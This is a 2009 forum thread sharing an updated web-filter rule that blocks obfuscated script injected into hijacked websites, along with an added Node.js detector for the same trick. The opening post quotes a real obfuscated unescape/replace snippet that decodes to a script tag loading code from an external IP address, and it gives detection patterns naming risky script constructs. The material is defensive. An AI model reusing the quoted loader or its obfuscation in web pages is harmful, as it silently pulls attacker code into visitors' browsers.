Bugfix + 0day: JS Kill - Specific Escaped Code
Apr. 01, 2009, 09:25 PM
Post: #1
Bugfix + 0day: JS Kill - Specific Escaped Code
Two changes:
- Global variable "a" wasn't always reset, resulting in odd (but harmless) secondary effects.
- I came across two sites today containing code (pointing to a Latvian server) like:
Code:
document.write(unescape('%3Cscrz7RiKQpt%20srK7c%3D%2F%2F94%2E247cMV%2E6xE2Hsh%2E1z7R93N5z7R%2FfIejq3Nuery%2Ejz7RsK7%3E3N%3C%2FsfIecriz7Rpt3N%3E').replace(/K7|fIe|cMV|z7R|KQ|Hsh|6xE|3N|NK/g,""));


If the new subroutine matches, you'll get a Log-Rare entry like:
Code:
WEB JS_Escape     replace     http://my-hijacked-site.com/

Let me know of any false positives.


Code:
[Patterns]
Name = "JS Kill: Specific Escaped Code     9.04.01 [sd] (d.2)"
Active = TRUE
URL = "($TYPE(htm)|$TYPE(js)|$TYPE(vbs))(^$TST(keyword=*.(a_js|a_jsmeth).*))"
Limit = 7800
Match = "\= \" (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
        "*\"$SET(1==\"\")$SET(5= (string))|$SET(1==\"\"; var prxBlocked=\")$SET(5= (string, large))*"
        ")&&(^*</script)\6)"
        "|\= \' (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
        "*\'$SET(1==\'\')$SET(5= (string))|$SET(1==\'\'; var prxBlocked=\')$SET(5= (string, large))*"
        ")&&(^*</script)\6)"
        "|unescape \($TST(script=[1s]*) ("
        "$INEST(\(,(")\2(^%") (%3C(%73%63|%53%43)\4*|\6),\))\)"
        "((^ [,;)])(.(replace)\4$SET(1=\2\2.replace)|)|$SET(1=\2\2))"
        "|\\(")\2 (%3C(%73%63|%53%43)\4*|\6)\\$TST(\2) \)((^ [,;)])|$SET(1=\\\2\\\2))$SET(5= (2nd level))"
        "|(\\+")\2(^%")$SET(1=PrxVoidF\(\2Blocked: $GET(a)\2, \2\4\6)$SET(5= (large))"
        " (^*</script)(%3C(%73%63|%53%43)\4\6|\6)"
        ")"
        "&"
        "$TST(\4=replace$SET(a=\4)|$SET(a=script)*)"
        "|$TST($UESC(\6)=*("
        ".(createControlRange|FileSystemObject|fromCharCode)\4$SET(a=\4)"
        "|<(iframe$SET(a=iframe)|applet$SET(a=applet)|object[^>]++data=$SET(a=object data))"
        "|c("
        "reateObject$SET(a=CreateObject)"
        "|l(sid( \(" {| : {+|=" {+)|assid=" {+)(^D27CDB6E-AE6D-11cf-96B8-444553540000|[^0-9a-f])"
        "$LST(ClassIDs)$SET(a=ClsID: \9)"
        ")"
        "|ms-its:$SET(a=ms-its)"
        "|src=$TST(flag=*.adurl:1.*)(\\(")\3 ((^\\$TST(\3))*\\$TST(\3)&&$LST(AdList)$SET(a=src: \9)*)|"
        "$AV( ?*& $LST(AdList)$SET(a=src: \9)))"
        "|unescape(^(^ \())$SET(a=unescape)"
        "|VBScript$SET(a=VBScript)"
        ")*)"
        "&"
        "($TYPE(htm)$SET(eHits=$GET(eHits)"
        "%3Cspan class=%22ProxFly-Span%22>$GET(mHead) JS Escape:%3C/span>"
        "      $ESC($GET(a))\5%3Cbr class=%22ProxFly-Br%22 />"
        ")|)"
        "($TST(volat=*.log:2*)$ADDLST(Log-Main,[$DTM(d T)]\tWEB JS_Escape\5 \t$GET(a) \t\u)|)"
        "($TST(volat=*.log:[12]c.*)$ADDLST(Log-Rare,WEB JS_Escape\5 \t$GET(a) \t\u)|)"
Replace = "\1$SET(a=)"
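Added example (my own Node.js code, not sidki's filter and not from this thread): a small detector for the unescape('%...').replace(/junk/g,"") idiom the filter above targets. It decodes the literal the way the browser would and applies the filter's verdict logic: a chained .replace on an escaped literal is blocked and logged as "replace", otherwise the decoded text is scanned for a subset of the filter's keyword list. The function names, the SUSPECT list and the benign sample are assumptions of mine; the malicious sample is the one quoted in the post.

```javascript
// Matches unescape('<literal starting with %>'), optionally followed by
// .replace(/<junk alternation>/g, "") -- the shape of the sample in the post.
const ESCAPED_CALL =
  /unescape\(\s*(['"])(%[^'"]*)\1\s*\)(\.replace\(\/([^/]+)\/g\s*,\s*(['"])\5\))?/;

// Subset of the constructs the filter tests for in the unescaped text (assumed list).
const SUSPECT =
  /<script\b|<iframe\b|<applet\b|createobject|fromcharcode|filesystemobject|unescape\(|vbscript/i;

// Decode the literal as the browser would: unescape(), then strip the junk
// tokens with the very regex the obfuscated code passes to replace().
function decodeEscapedCall(snippet) {
  const m = ESCAPED_CALL.exec(snippet);
  if (!m) return null;
  let text = unescape(m[2]);            // same global the obfuscated code calls
  if (m[4]) text = text.replace(new RegExp(m[4], "g"), "");
  return { decoded: text, hasReplace: Boolean(m[3]) };
}

// Verdict modelled on the filter: escaped literal + .replace is blocked outright
// (logged as "replace"); otherwise block only on a suspect construct in the
// decoded text. Returns the decoded text so an analyst can see what was hidden.
function classify(snippet) {
  const r = decodeEscapedCall(snippet);
  if (!r) return { blocked: false, reason: null, decoded: null };
  if (r.hasReplace) return { blocked: true, reason: "replace", decoded: r.decoded };
  const kw = SUSPECT.exec(r.decoded);
  if (kw) return { blocked: true, reason: kw[0].toLowerCase(), decoded: r.decoded };
  return { blocked: false, reason: null, decoded: r.decoded };
}

// Sample quoted in the post above, plus a constructed benign snippet.
const MALICIOUS = `document.write(unescape('%3Cscrz7RiKQpt%20srK7c%3D%2F%2F94%2E247cMV%2E6xE2Hsh%2E1z7R93N5z7R%2FfIejq3Nuery%2Ejz7RsK7%3E3N%3C%2FsfIecriz7Rpt3N%3E').replace(/K7|fIe|cMV|z7R|KQ|Hsh|6xE|3N|NK/g,""));`;
const BENIGN = "document.write(unescape('%3Cb%3EHello%3C%2Fb%3E'));";

for (const s of [MALICIOUS, BENIGN]) {
  const v = classify(s);
  console.log(v.blocked ? `BLOCK (${v.reason}):` : "allow:", v.decoded);
}
```

Running it shows the post's sample decoding to a plain external script tag, which is why the filter can flag it without knowing the junk tokens in advance.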
Apr. 02, 2009, 01:15 AM
Post: #2
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
Where do I put the filter?

Under JS intercept?
Apr. 02, 2009, 01:34 AM (This post was last modified: Apr. 02, 2009 01:39 AM by sidki3003.)
Post: #3
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
Dang, as mentioned above, it's an update.
So, look for the previous version, untick it, place the new version above it, save the config.
Apr. 02, 2009, 02:31 AM
Post: #4
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
Oh bugger. My apology!